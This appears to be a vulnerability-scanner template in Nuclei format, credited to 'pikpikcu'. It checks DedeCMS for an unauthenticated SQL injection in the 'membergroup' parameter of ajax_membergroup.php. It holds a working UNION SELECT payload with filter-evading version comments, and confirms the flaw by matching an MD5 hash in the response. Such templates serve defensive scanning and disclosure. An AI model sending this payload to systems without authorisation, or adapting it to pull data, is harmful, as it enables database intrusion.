id: dedecms-membergroup-sqli info: name: DedeCMS Membergroup SQLI author: pikpikcu severity: medium description: A vulnerability in the DedeCMS product allows remote unauthenticated users to inject arbitrary SQL statements via the 'ajax_membergroup.php' endpoint and the 'membergroup' parameter. reference: http://www.dedeyuan.com/xueyuan/wenti/1244.html tags: sqli,dedecms requests: - method: GET path: - "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`" matchers-condition: and matchers: - type: word words: - "52c69e3a57331081823331c4e69d3f2e" part: body - type: status status: - 200